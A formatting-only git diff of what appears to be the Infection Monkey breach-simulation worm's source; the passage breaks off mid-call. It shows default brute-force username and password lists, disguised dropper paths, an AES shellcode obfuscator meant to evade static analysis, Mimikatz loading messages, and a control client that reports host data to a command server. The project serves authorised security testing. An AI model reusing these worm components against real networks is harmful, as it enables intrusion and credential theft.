PILLARS_KEY: [PEOPLE, WORKLOADS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_SCOUTSUITE_RESTRICTIVE_POLICIES: { TEST_EXPLANATION_KEY: "ScoutSuite searched for permissive user access policies.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "ScoutSuite found permissive user access policies.", - STATUS_PASSED: "ScoutSuite found no issues related to user access policies." + STATUS_PASSED: "ScoutSuite found no issues related to user access policies.", }, PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES, PILLARS_KEY: [PEOPLE, WORKLOADS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_SCOUTSUITE_LOGGING: { TEST_EXPLANATION_KEY: "ScoutSuite searched for issues, related to logging.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "ScoutSuite found logging issues.", - STATUS_PASSED: "ScoutSuite found no logging issues." + STATUS_PASSED: "ScoutSuite found no logging issues.", }, PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING, PILLARS_KEY: [AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_SCOUTSUITE_SERVICE_SECURITY: { TEST_EXPLANATION_KEY: "ScoutSuite searched for service security issues.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "ScoutSuite found service security issues.", - STATUS_PASSED: "ScoutSuite found no service security issues." + STATUS_PASSED: "ScoutSuite found no service security issues.", }, PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING, PILLARS_KEY: [DEVICES, NETWORKS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] - } + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], + }, } EVENT_TYPE_MONKEY_NETWORK = "monkey_network" @@ -282,7 +290,7 @@ PILLARS_TO_TESTS = { DEVICES: [], WORKLOADS: [], VISIBILITY_ANALYTICS: [], - AUTOMATION_ORCHESTRATION: [] + AUTOMATION_ORCHESTRATION: [], } PRINCIPLES_TO_TESTS = {} diff --git a/monkey/common/config_value_paths.py b/monkey/common/config_value_paths.py index 5ddbe8605..4fc94ea4e 100644 --- a/monkey/common/config_value_paths.py +++ b/monkey/common/config_value_paths.py @@ -1,13 +1,13 @@ -AWS_KEYS_PATH = ['internal', 'monkey', 'aws_keys'] -STARTED_ON_ISLAND_PATH = ['internal', 'general', 'started_on_island'] -EXPORT_MONKEY_TELEMS_PATH = ['internal', 'testing', 'export_monkey_telems'] -CURRENT_SERVER_PATH = ['internal', 'island_server', 'current_server'] -SSH_KEYS_PATH = ['internal', 'exploits', 'exploit_ssh_keys'] -INACCESSIBLE_SUBNETS_PATH = ['basic_network', 'network_analysis', 'inaccessible_subnets'] -USER_LIST_PATH = ['basic', 'credentials', 'exploit_user_list'] -PASSWORD_LIST_PATH = ['basic', 'credentials', 'exploit_password_list'] -EXPLOITER_CLASSES_PATH = ['basic', 'exploiters', 'exploiter_classes'] -SUBNET_SCAN_LIST_PATH = ['basic_network', 'scope', 'subnet_scan_list'] -LOCAL_NETWORK_SCAN_PATH = ['basic_network', 'scope', 'local_network_scan'] -LM_HASH_LIST_PATH = ['internal', 'exploits', 'exploit_lm_hash_list'] -NTLM_HASH_LIST_PATH = ['internal', 'exploits', 'exploit_ntlm_hash_list'] +AWS_KEYS_PATH = ["internal", "monkey", "aws_keys"] +STARTED_ON_ISLAND_PATH = ["internal", "general", "started_on_island"] +EXPORT_MONKEY_TELEMS_PATH = ["internal", "testing", "export_monkey_telems"] +CURRENT_SERVER_PATH = ["internal", "island_server", "current_server"] +SSH_KEYS_PATH = ["internal", "exploits", "exploit_ssh_keys"] +INACCESSIBLE_SUBNETS_PATH = ["basic_network", "network_analysis", "inaccessible_subnets"] +USER_LIST_PATH = ["basic", "credentials", "exploit_user_list"] +PASSWORD_LIST_PATH = ["basic", "credentials", "exploit_password_list"] +EXPLOITER_CLASSES_PATH = ["basic", "exploiters", "exploiter_classes"] +SUBNET_SCAN_LIST_PATH = ["basic_network", "scope", "subnet_scan_list"] +LOCAL_NETWORK_SCAN_PATH = ["basic_network", "scope", "local_network_scan"] +LM_HASH_LIST_PATH = ["internal", "exploits", "exploit_lm_hash_list"] +NTLM_HASH_LIST_PATH = ["internal", "exploits", "exploit_ntlm_hash_list"] diff --git a/monkey/common/network/__init__.py b/monkey/common/network/__init__.py index ee5b79ad0..a44473084 100644 --- a/monkey/common/network/__init__.py +++ b/monkey/common/network/__init__.py @@ -1 +1 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" diff --git a/monkey/common/network/network_range.py b/monkey/common/network/network_range.py index 7eb082c8f..581c4bf77 100644 --- a/monkey/common/network/network_range.py +++ b/monkey/common/network/network_range.py @@ -5,7 +5,7 @@ import socket import struct from abc import ABCMeta, abstractmethod -__author__ = 'itamar' +__author__ = "itamar" LOG = logging.getLogger(__name__) @@ -48,14 +48,14 @@ class NetworkRange(object, metaclass=ABCMeta): address_str = address_str.strip() if NetworkRange.check_if_range(address_str): return IpRange(ip_range=address_str) - if -1 != address_str.find('/'): + if -1 != address_str.find("/"): return CidrRange(cidr_range=address_str) return SingleIpRange(ip_address=address_str) @staticmethod def check_if_range(address_str): - if -1 != address_str.find('-'): - ips = address_str.split('-') + if -1 != address_str.find("-"): + ips = address_str.split("-") try: ipaddress.ip_address(ips[0]) and ipaddress.ip_address(ips[1]) except ValueError: @@ -85,28 +85,36 @@ class CidrRange(NetworkRange): return ipaddress.ip_address(ip_address) in self._ip_network def _get_range(self): - return [CidrRange._ip_to_number(str(x)) for x in self._ip_network if x != self._ip_network.broadcast_address] + return [ + CidrRange._ip_to_number(str(x)) + for x in self._ip_network + if x != self._ip_network.broadcast_address + ] class IpRange(NetworkRange): def __init__(self, ip_range=None, lower_end_ip=None, higher_end_ip=None, shuffle=True): super(IpRange, self).__init__(shuffle=shuffle) if ip_range is not None: - addresses = ip_range.split('-') + addresses = ip_range.split("-") if len(addresses) != 2: - raise ValueError('Illegal IP range format: %s. Format is 192.168.0.5-192.168.0.20' % ip_range) + raise ValueError( + "Illegal IP range format: %s. Format is 192.168.0.5-192.168.0.20" % ip_range + ) self._lower_end_ip, self._higher_end_ip = [x.strip() for x in addresses] elif (lower_end_ip is not None) and (higher_end_ip is not None): self._lower_end_ip = lower_end_ip.strip() self._higher_end_ip = higher_end_ip.strip() else: - raise ValueError('Illegal IP range: %s' % ip_range) + raise ValueError("Illegal IP range: %s" % ip_range) self._lower_end_ip_num = self._ip_to_number(self._lower_end_ip) self._higher_end_ip_num = self._ip_to_number(self._higher_end_ip) if self._higher_end_ip_num < self._lower_end_ip_num: raise ValueError( - 'Higher end IP %s is smaller than lower end IP %s' % (self._lower_end_ip, self._higher_end_ip)) + "Higher end IP %s is smaller than lower end IP %s" + % (self._lower_end_ip, self._higher_end_ip) + ) def __repr__(self): return "" % (self._lower_end_ip, self._higher_end_ip) @@ -156,7 +164,7 @@ class SingleIpRange(NetworkRange): :return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com) """ # The most common use case is to enter ip/range into "Scan IP/subnet list" - domain_name = '' + domain_name = "" # Try casting user's input as IP try: @@ -167,8 +175,10 @@ class SingleIpRange(NetworkRange): ip = socket.gethostbyname(string_) domain_name = string_ except socket.error: - LOG.error("Your specified host: {} is not found as a domain name and" - " it's not an IP address".format(string_)) + LOG.error( + "Your specified host: {} is not found as a domain name and" + " it's not an IP address".format(string_) + ) return None, string_ # If a string_ was entered instead of IP we presume that it was domain name and translate it return ip, domain_name diff --git a/monkey/common/network/network_utils.py b/monkey/common/network/network_utils.py index eaa2bc195..6aa5076ae 100644 --- a/monkey/common/network/network_utils.py +++ b/monkey/common/network/network_utils.py @@ -15,6 +15,6 @@ def get_host_from_network_location(network_location: str) -> str: def remove_port(url): parsed = urlparse(url) - with_port = f'{parsed.scheme}://{parsed.netloc}' - without_port = re.sub(':[0-9]+(?=$|/)', '', with_port) + with_port = f"{parsed.scheme}://{parsed.netloc}" + without_port = re.sub(":[0-9]+(?=$|/)", "", with_port) return without_port diff --git a/monkey/common/network/test_network_utils.py b/monkey/common/network/test_network_utils.py index 396bc1c0a..0376cd6d5 100644 --- a/monkey/common/network/test_network_utils.py +++ b/monkey/common/network/test_network_utils.py @@ -12,6 +12,6 @@ class TestNetworkUtils(TestCase): assert get_host_from_network_location("user:password@host:8080") == "host" def test_remove_port_from_url(self): - assert remove_port('https://google.com:80') == 'https://google.com' - assert remove_port('https://8.8.8.8:65336') == 'https://8.8.8.8' - assert remove_port('ftp://ftpserver.com:21/hello/world') == 'ftp://ftpserver.com' + assert remove_port("https://google.com:80") == "https://google.com" + assert remove_port("https://8.8.8.8:65336") == "https://8.8.8.8" + assert remove_port("ftp://ftpserver.com:21/hello/world") == "ftp://ftpserver.com" diff --git a/monkey/common/network/test_segmentation_utils.py b/monkey/common/network/test_segmentation_utils.py index 1bb3d0484..c4728f982 100644 --- a/monkey/common/network/test_segmentation_utils.py +++ b/monkey/common/network/test_segmentation_utils.py @@ -8,21 +8,13 @@ class TestSegmentationUtils: target = CidrRange("2.2.2.0/24") # IP not in both - assert get_ip_in_src_and_not_in_dst( - ["3.3.3.3", "4.4.4.4"], source, target - ) is None + assert get_ip_in_src_and_not_in_dst(["3.3.3.3", "4.4.4.4"], source, target) is None # IP not in source, in target - assert (get_ip_in_src_and_not_in_dst( - ["2.2.2.2"], source, target - )) is None + assert (get_ip_in_src_and_not_in_dst(["2.2.2.2"], source, target)) is None # IP in source, not in target - assert (get_ip_in_src_and_not_in_dst( - ["8.8.8.8", "1.1.1.1"], source, target - )) + assert get_ip_in_src_and_not_in_dst(["8.8.8.8", "1.1.1.1"], source, target) # IP in both subnets - assert (get_ip_in_src_and_not_in_dst( - ["8.8.8.8", "1.1.1.1"], source, source - )) is None + assert (get_ip_in_src_and_not_in_dst(["8.8.8.8", "1.1.1.1"], source, source)) is None diff --git a/monkey/common/utils/attack_utils.py b/monkey/common/utils/attack_utils.py index 0eadbedcc..c911ed780 100644 --- a/monkey/common/utils/attack_utils.py +++ b/monkey/common/utils/attack_utils.py @@ -13,17 +13,29 @@ class ScanStatus(Enum): class UsageEnum(Enum): - SMB = {ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.", - ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR."} - MIMIKATZ = {ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.", - ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed."} - MIMIKATZ_WINAPI = {ScanStatus.USED.value: "WinAPI was called to load mimikatz.", - ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz."} - DROPPER = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."} - SINGLETON_WINAPI = {ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.", - ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton" - " for monkey process wasn't successful."} - DROPPER_WINAPI = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."} + SMB = { + ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.", + ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR.", + } + MIMIKATZ = { + ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.", + ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed.", + } + MIMIKATZ_WINAPI = { + ScanStatus.USED.value: "WinAPI was called to load mimikatz.", + ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz.", + } + DROPPER = { + ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot." + } + SINGLETON_WINAPI = { + ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.", + ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton" + " for monkey process wasn't successful.", + } + DROPPER_WINAPI = { + ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot." + } # Dict that describes what BITS job was used for @@ -31,8 +43,10 @@ BITS_UPLOAD_STRING = "BITS job was used to upload monkey to a remote system." def format_time(time): - return "%s-%s %s:%s:%s" % (time.date().month, - time.date().day, - time.time().hour, - time.time().minute, - time.time().second) + return "%s-%s %s:%s:%s" % ( + time.date().month, + time.date().day, + time.time().hour, + time.time().minute, + time.time().second, + ) diff --git a/monkey/common/utils/mongo_utils.py b/monkey/common/utils/mongo_utils.py index 6d784d7ac..a76548738 100644 --- a/monkey/common/utils/mongo_utils.py +++ b/monkey/common/utils/mongo_utils.py @@ -1,14 +1,13 @@ import sys -if sys.platform == 'win32': +if sys.platform == "win32": import win32com import wmi -__author__ = 'maor.rayzin' +__author__ = "maor.rayzin" class MongoUtils: - def __init__(self): # Static class pass @@ -35,7 +34,10 @@ class MongoUtils: try: # objectSid property of ds_user is problematic and need this special treatment. # ISWbemObjectEx interface. Class Uint8Array ? - if str(o._oleobj_.GetTypeInfo().GetTypeAttr().iid) == "{269AD56A-8A67-4129-BC8C-0506DCFE9880}": + if ( + str(o._oleobj_.GetTypeInfo().GetTypeAttr().iid) + == "{269AD56A-8A67-4129-BC8C-0506DCFE9880}" + ): return o.Value except Exception: pass diff --git a/monkey/common/utils/shellcode_obfuscator.py b/monkey/common/utils/shellcode_obfuscator.py index 4e4c2ed3d..11635201e 100644 --- a/monkey/common/utils/shellcode_obfuscator.py +++ b/monkey/common/utils/shellcode_obfuscator.py @@ -9,8 +9,8 @@ from Crypto.Cipher import AES # noqa: DUO133 # nosec: B413 # We only encrypt payloads to hide them from static analysis # it's OK to have these keys plaintext -KEY = b'1234567890123456' -NONCE = b'\x93n2\xbc\xf5\x8d:\xc2fP\xabn\x02\xb3\x17f' +KEY = b"1234567890123456" +NONCE = b"\x93n2\xbc\xf5\x8d:\xc2fP\xabn\x02\xb3\x17f" # Use this manually to get obfuscated bytes of shellcode diff --git a/monkey/common/utils/test_shellcode_obfuscator.py b/monkey/common/utils/test_shellcode_obfuscator.py index 7116993f2..bda9f7996 100644 --- a/monkey/common/utils/test_shellcode_obfuscator.py +++ b/monkey/common/utils/test_shellcode_obfuscator.py @@ -2,12 +2,11 @@ from unittest import TestCase from common.utils.shellcode_obfuscator import clarify, obfuscate -SHELLCODE = b'1234567890abcd' -OBFUSCATED_SHELLCODE = b'\xc7T\x9a\xf4\xb1cn\x94\xb0X\xf2\xfb^=' +SHELLCODE = b"1234567890abcd" +OBFUSCATED_SHELLCODE = b"\xc7T\x9a\xf4\xb1cn\x94\xb0X\xf2\xfb^=" class TestShellcodeObfuscator(TestCase): - def test_obfuscate(self): assert obfuscate(SHELLCODE) == OBFUSCATED_SHELLCODE diff --git a/monkey/common/utils/wmi_utils.py b/monkey/common/utils/wmi_utils.py index fc82663cb..9b94f90ca 100644 --- a/monkey/common/utils/wmi_utils.py +++ b/monkey/common/utils/wmi_utils.py @@ -8,11 +8,10 @@ if sys.platform.startswith("win"): from .mongo_utils import MongoUtils -__author__ = 'maor.rayzin' +__author__ = "maor.rayzin" class WMIUtils: - def __init__(self): # Static class pass diff --git a/monkey/common/version.py b/monkey/common/version.py index 5e8dd4bf4..4070fc2f6 100644 --- a/monkey/common/version.py +++ b/monkey/common/version.py @@ -16,10 +16,12 @@ def get_version(build=BUILD): def print_version(): parser = argparse.ArgumentParser() - parser.add_argument("-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str) + parser.add_argument( + "-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str + ) args = parser.parse_args() print(get_version(args.build)) -if __name__ == '__main__': +if __name__ == "__main__": print_version() diff --git a/monkey/infection_monkey/__init__.py b/monkey/infection_monkey/__init__.py index ee5b79ad0..a44473084 100644 --- a/monkey/infection_monkey/__init__.py +++ b/monkey/infection_monkey/__init__.py @@ -1 +1 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" diff --git a/monkey/infection_monkey/config.py b/monkey/infection_monkey/config.py index 6529ade86..7aeaccee2 100644 --- a/monkey/infection_monkey/config.py +++ b/monkey/infection_monkey/config.py @@ -5,14 +5,19 @@ import uuid from abc import ABCMeta from itertools import product -__author__ = 'itamar' +__author__ = "itamar" GUID = str(uuid.getnode()) -EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'monkey.bin') +EXTERNAL_CONFIG_FILE = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), "monkey.bin") -SENSITIVE_FIELDS = ["exploit_password_list", "exploit_user_list", "exploit_ssh_keys", "aws_secret_access_key", - "aws_session_token"] +SENSITIVE_FIELDS = [ + "exploit_password_list", + "exploit_user_list", + "exploit_ssh_keys", + "aws_secret_access_key", + "aws_session_token", +] LOCAL_CONFIG_VARS = ["name", "id", "current_server", "max_depth"] HIDDEN_FIELD_REPLACEMENT_CONTENT = "hidden" @@ -21,7 +26,7 @@ class Configuration(object): def from_kv(self, formatted_data): unknown_items = [] for key, value in list(formatted_data.items()): - if key.startswith('_'): + if key.startswith("_"): continue if key in LOCAL_CONFIG_VARS: continue @@ -45,7 +50,7 @@ class Configuration(object): def as_dict(self): result = {} for key in dir(Configuration): - if key.startswith('_'): + if key.startswith("_"): continue try: value = getattr(self, key) @@ -75,10 +80,10 @@ class Configuration(object): ########################### use_file_logging = True - dropper_log_path_windows = '%temp%\\~df1562.tmp' - dropper_log_path_linux = '/tmp/user-1562' - monkey_log_path_windows = '%temp%\\~df1563.tmp' - monkey_log_path_linux = '/tmp/user-1563' + dropper_log_path_windows = "%temp%\\~df1562.tmp" + dropper_log_path_linux = "/tmp/user-1562" + monkey_log_path_windows = "%temp%\\~df1563.tmp" + monkey_log_path_linux = "/tmp/user-1563" send_log_to_server = True ########################### @@ -88,16 +93,16 @@ class Configuration(object): dropper_try_move_first = True dropper_set_date = True dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll" - dropper_date_reference_path_linux = '/bin/sh' + dropper_date_reference_path_linux = "/bin/sh" dropper_target_path_win_32 = r"C:\Windows\temp\monkey32.exe" dropper_target_path_win_64 = r"C:\Windows\temp\monkey64.exe" - dropper_target_path_linux = '/tmp/monkey' + dropper_target_path_linux = "/tmp/monkey" ########################### # Kill file ########################### - kill_file_path_windows = '%windir%\\monkey.not' - kill_file_path_linux = '/var/run/monkey.not' + kill_file_path_windows = "%windir%\\monkey.not" + kill_file_path_linux = "/var/run/monkey.not" ########################### # monkey config @@ -134,9 +139,7 @@ class Configuration(object): current_server = "" # Configuration servers to try to connect to, in this order. - command_servers = [ - "192.0.2.0:5000" - ] + command_servers = ["192.0.2.0:5000"] # sets whether or not to locally save the running configuration after finishing serialize_config = False @@ -150,7 +153,7 @@ class Configuration(object): keep_tunnel_open_time = 60 # Monkey files directory name - monkey_dir_name = 'monkey_dir' + monkey_dir_name = "monkey_dir" ########################### # scanners config @@ -165,22 +168,14 @@ class Configuration(object): blocked_ips = [] # TCP Scanner - HTTP_PORTS = [80, 8080, 443, - 8008, # HTTP alternate - 7001 # Oracle Weblogic default server port - ] - tcp_target_ports = [22, - 2222, - 445, - 135, - 3389, - 80, - 8080, - 443, - 8008, - 3306, - 9200, - 5432] + HTTP_PORTS = [ + 80, + 8080, + 443, + 8008, # HTTP alternate + 7001, # Oracle Weblogic default server port + ] + tcp_target_ports = [22, 2222, 445, 135, 3389, 80, 8080, 443, 8008, 3306, 9200, 5432] tcp_target_ports.extend(HTTP_PORTS) tcp_scan_timeout = 3000 # 3000 Milliseconds tcp_scan_interval = 0 # in milliseconds @@ -221,11 +216,11 @@ class Configuration(object): :return: """ cred_list = [] - for cred in product(self.exploit_user_list, self.exploit_password_list, [''], ['']): + for cred in product(self.exploit_user_list, self.exploit_password_list, [""], [""]): cred_list.append(cred) - for cred in product(self.exploit_user_list, [''], [''], self.exploit_ntlm_hash_list): + for cred in product(self.exploit_user_list, [""], [""], self.exploit_ntlm_hash_list): cred_list.append(cred) - for cred in product(self.exploit_user_list, [''], self.exploit_lm_hash_list, ['']): + for cred in product(self.exploit_user_list, [""], self.exploit_lm_hash_list, [""]): cred_list.append(cred) return cred_list @@ -241,15 +236,15 @@ class Configuration(object): password_hashed = hashlib.sha512(sensitive_data.encode()).hexdigest() return password_hashed - exploit_user_list = ['Administrator', 'root', 'user'] + exploit_user_list = ["Administrator", "root", "user"] exploit_password_list = ["Password1!", "1234", "password", "12345678"] exploit_lm_hash_list = [] exploit_ntlm_hash_list = [] exploit_ssh_keys = [] - aws_access_key_id = '' - aws_secret_access_key = '' - aws_session_token = '' + aws_access_key_id = "" + aws_secret_access_key = "" + aws_session_token = "" # smb/wmi exploiter smb_download_timeout = 300 # timeout in seconds @@ -258,7 +253,16 @@ class Configuration(object): # Timeout (in seconds) for sambacry's trigger to yield results. sambacry_trigger_timeout = 5 # Folder paths to guess share lies inside. - sambacry_folder_paths_to_guess = ['/', '/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '/home'] + sambacry_folder_paths_to_guess = [ + "/", + "/mnt", + "/tmp", + "/storage", + "/export", + "/share", + "/shares", + "/home", + ] # Shares to not check if they're writable. sambacry_shares_not_to_check = ["IPC$", "print$"] diff --git a/monkey/infection_monkey/control.py b/monkey/infection_monkey/control.py index 611166afa..19428b17a 100644 --- a/monkey/infection_monkey/control.py +++ b/monkey/infection_monkey/control.py @@ -9,9 +9,11 @@ from requests.exceptions import ConnectionError import infection_monkey.monkeyfs as monkeyfs import infection_monkey.tunnel as tunnel -from common.common_consts.timeouts import (LONG_REQUEST_TIMEOUT, - MEDIUM_REQUEST_TIMEOUT, - SHORT_REQUEST_TIMEOUT) +from common.common_consts.timeouts import ( + LONG_REQUEST_TIMEOUT, + MEDIUM_REQUEST_TIMEOUT, + SHORT_REQUEST_TIMEOUT, +) from common.common_consts.api_url_consts import T1216_PBA_FILE_DOWNLOAD_PATH from infection_monkey.config import GUID, WormConfiguration from infection_monkey.network.info import check_internet_access, local_ips @@ -19,7 +21,7 @@ from infection_monkey.transport.http import HTTPConnectProxy from infection_monkey.transport.tcp import TcpProxy from infection_monkey.utils.exceptions.planned_shutdown_exception import PlannedShutdownException -__author__ = 'hoffer' +__author__ = "hoffer" requests.packages.urllib3.disable_warnings() @@ -49,27 +51,34 @@ class ControlClient(object): if has_internet_access is None: has_internet_access = check_internet_access(WormConfiguration.internet_services) - monkey = {'guid': GUID, - 'hostname': hostname, - 'ip_addresses': local_ips(), - 'description': " ".join(platform.uname()), - 'internet_access': has_internet_access, - 'config': WormConfiguration.as_dict(), - 'parent': parent} + monkey = { + "guid": GUID, + "hostname": hostname, + "ip_addresses": local_ips(), + "description": " ".join(platform.uname()), + "internet_access": has_internet_access, + "config": WormConfiguration.as_dict(), + "parent": parent, + } if ControlClient.proxies: - monkey['tunnel'] = ControlClient.proxies.get('https') + monkey["tunnel"] = ControlClient.proxies.get("https") - requests.post("https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123 - data=json.dumps(monkey), - headers={'content-type': 'application/json'}, - verify=False, - proxies=ControlClient.proxies, - timeout=20) + requests.post( + "https://%s/api/monkey" % (WormConfiguration.current_server,), # noqa: DUO123 + data=json.dumps(monkey), + headers={"content-type": "application/json"}, + verify=False, + proxies=ControlClient.proxies, + timeout=20, + ) @staticmethod def find_server(default_tunnel=None): - LOG.debug("Trying to wake up with Monkey Island servers list: %r" % WormConfiguration.command_servers) + LOG.debug( + "Trying to wake up with Monkey Island servers list: %r" + % WormConfiguration.command_servers + ) if default_tunnel: LOG.debug("default_tunnel: %s" % (default_tunnel,)) @@ -83,10 +92,12 @@ class ControlClient(object): if ControlClient.proxies: debug_message += " through proxies: %s" % ControlClient.proxies LOG.debug(debug_message) - requests.get(f"https://{server}/api?action=is-up", # noqa: DUO123 - verify=False, - proxies=ControlClient.proxies, - timeout=TIMEOUT_IN_SECONDS) + requests.get( + f"https://{server}/api?action=is-up", # noqa: DUO123 + verify=False, + proxies=ControlClient.proxies, + timeout=TIMEOUT_IN_SECONDS, + ) WormConfiguration.current_server = current_server break @@ -105,7 +116,7 @@ class ControlClient(object): if proxy_find: proxy_address, proxy_port = proxy_find LOG.info("Found tunnel at %s:%s" % (proxy_address, proxy_port)) - ControlClient.proxies['https'] = 'https://%s:%s' % (proxy_address, proxy_port) + ControlClient.proxies["https"] = "https://%s:%s" % (proxy_address, proxy_port) return ControlClient.find_server() else: LOG.info("No tunnel found") @@ -118,74 +129,97 @@ class ControlClient(object): try: monkey = {} if ControlClient.proxies: - monkey['tunnel'] = ControlClient.proxies.get('https') - requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123 - data=json.dumps(monkey), - headers={'content-type': 'application/json'}, - verify=False, - proxies=ControlClient.proxies, - timeout=MEDIUM_REQUEST_TIMEOUT) + monkey["tunnel"] = ControlClient.proxies.get("https") + requests.patch( + "https://%s/api/monkey/%s" + % (WormConfiguration.current_server, GUID), # noqa: DUO123 + data=json.dumps(monkey), + headers={"content-type": "application/json"}, + verify=False, + proxies=ControlClient.proxies, + timeout=MEDIUM_REQUEST_TIMEOUT, + ) except Exception as exc: - LOG.warning("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning( + "Error connecting to control server %s: %s", WormConfiguration.current_server, exc + ) return {} @staticmethod def send_telemetry(telem_category, json_data: str): if not WormConfiguration.current_server: - LOG.error("Trying to send %s telemetry before current server is established, aborting." % telem_category) + LOG.error( + "Trying to send %s telemetry before current server is established, aborting." + % telem_category + ) return try: - telemetry = {'monkey_guid': GUID, 'telem_category': telem_category, 'data': json_data} - requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,), # noqa: DUO123 - data=json.dumps(telemetry), - headers={'content-type': 'application/json'}, - verify=False, - proxies=ControlClient.proxies, - timeout=MEDIUM_REQUEST_TIMEOUT) + telemetry = {"monkey_guid": GUID, "telem_category": telem_category, "data": json_data} + requests.post( + "https://%s/api/telemetry" % (WormConfiguration.current_server,), # noqa: DUO123 + data=json.dumps(telemetry), + headers={"content-type": "application/json"}, + verify=False, + proxies=ControlClient.proxies, + timeout=MEDIUM_REQUEST_TIMEOUT, + ) except Exception as exc: - LOG.warning("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning( + "Error connecting to control server %s: %s", WormConfiguration.current_server, exc + ) @staticmethod def send_log(log): if not WormConfiguration.current_server: return try: - telemetry = {'monkey_guid': GUID, 'log': json.dumps(log)} - requests.post("https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123 - data=json.dumps(telemetry), - headers={'content-type': 'application/json'}, - verify=False, - proxies=ControlClient.proxies, - timeout=MEDIUM_REQUEST_TIMEOUT) + telemetry = {"monkey_guid": GUID, "log": json.dumps(log)} + requests.post( + "https://%s/api/log" % (WormConfiguration.current_server,), # noqa: DUO123 + data=json.dumps(telemetry), + headers={"content-type": "application/json"}, + verify=False, + proxies=ControlClient.proxies, + timeout=MEDIUM_REQUEST_TIMEOUT, + ) except Exception as exc: - LOG.warning("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning( + "Error connecting to control server %s: %s", WormConfiguration.current_server, exc + ) @staticmethod def load_control_config(): if not WormConfiguration.current_server: return try: - reply = requests.get("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123 - verify=False, - proxies=ControlClient.proxies, - timeout=MEDIUM_REQUEST_TIMEOUT) + reply = requests.get( + "https://%s/api/monkey/%s" + % (WormConfiguration.current_server, GUID), # noqa: DUO123 + verify=False, + proxies=ControlClient.proxies, + timeout=MEDIUM_REQUEST_TIMEOUT, + ) except Exception as exc: - LOG.warning("Error connecting to control server %s: %s", - WormConfiguration.current_server, exc) + LOG.warning( + "Error connecting to control server %s: %s", WormConfiguration.current_server, exc + ) return try: - unknown_variables = WormConfiguration.from_kv(reply.json().get('config')) - LOG.info("New configuration was loaded from server: %r" % - (WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()),)) + unknown_variables = WormConfiguration.from_kv(reply.json().get("config")) + LOG.info( + "New configuration was loaded from server: %r" + % (WormConfiguration.hide_sensitive_info(WormConfiguration.as_dict()),) + ) except Exception as exc: # we don't continue with default conf here because it might be dangerous - LOG.error("Error parsing JSON reply from control server %s (%s): %s", - WormConfiguration.current_server, reply._content, exc) + LOG.error( + "Error parsing JSON reply from control server %s (%s): %s", + WormConfiguration.current_server, + reply._content, + exc, + ) raise Exception("Couldn't load from from server's configuration, aborting. %s" % exc) if unknown_variables: @@ -196,14 +230,19 @@ class ControlClient(object): if not WormConfiguration.current_server: return try: - requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID), # noqa: DUO123 - data=json.dumps({'config_error': True}), - headers={'content-type': 'application/json'}, - verify=False, - proxies=ControlClient.proxies, - timeout=MEDIUM_REQUEST_TIMEOUT) + requests.patch( + "https://%s/api/monkey/%s" + % (WormConfiguration.current_server, GUID), # noqa: DUO123 + data=json.dumps({"config_error": True}), + headers={"content-type": "application/json"}, + verify=False, + proxies=ControlClient.proxies, + 